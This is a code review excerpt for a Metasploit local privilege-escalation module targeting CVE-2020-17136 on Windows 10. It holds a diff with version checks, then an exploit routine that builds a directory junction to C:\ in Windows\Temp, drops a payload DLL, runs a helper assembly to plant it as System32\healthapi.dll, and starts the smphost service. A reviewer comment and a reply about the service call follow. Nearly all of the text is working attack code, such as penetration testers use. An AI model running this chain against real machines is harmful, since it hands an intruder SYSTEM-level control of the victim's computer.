modules/exploits/windows/local/cve_2020_17136.rb

```diff
@@ -0,0 +1,323 @@
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.1256')) # Windows 10 v1903
+      return CheckCode::Appears('A vulnerable Windows 10 v1903 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1637')) # Windows 10 v1809
+      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
+    elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1902')) # Windows 10 v1803
+      return CheckCode::Appears('A vulnerable Windows 10 v1809 build was detected!')
+    else
+      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')
+    end
+  end
+
+  def exploit
+    if sysinfo['Architecture'] != 'x64'
+      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
+    end
+    dir_junct_path = 'C:\\Windows\\Temp'
+    intermediate_dir = rand_text_alpha(10).to_s
+    junction_dir = rand_text_alpha(10).to_s
+
+    cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
+    if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
+      fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
+    end
+    register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
+
+    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
+    if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
+      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
+    end
+    register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
+
+    exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
+    unless File.file?(exe_path)
+      fail_with(Failure::BadConfig, 'Assembly not found')
+    end
+    installed_dotnet_versions = get_dotnet_versions
+    vprint_status("Dot Net Versions installed on target: #{installed_dotnet_versions}")
+    if installed_dotnet_versions == []
+      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
+    end
+    rclr = find_required_clr(exe_path)
+    if check_requirements(rclr, installed_dotnet_versions) == false
+      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
+    end
+    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
+    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
+    write_file(payload_path, generate_payload_dll)
+    datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
+    register_file_for_cleanup(payload_path)
+    execute_assembly(exe_path)
+    cmd_exec('net start smphost')
```

Comment:
This should use the `service_start` method that's provided by the `Msf::Post::Windows::Services` mixin.

Reply:
Should be adjusted with the next commit.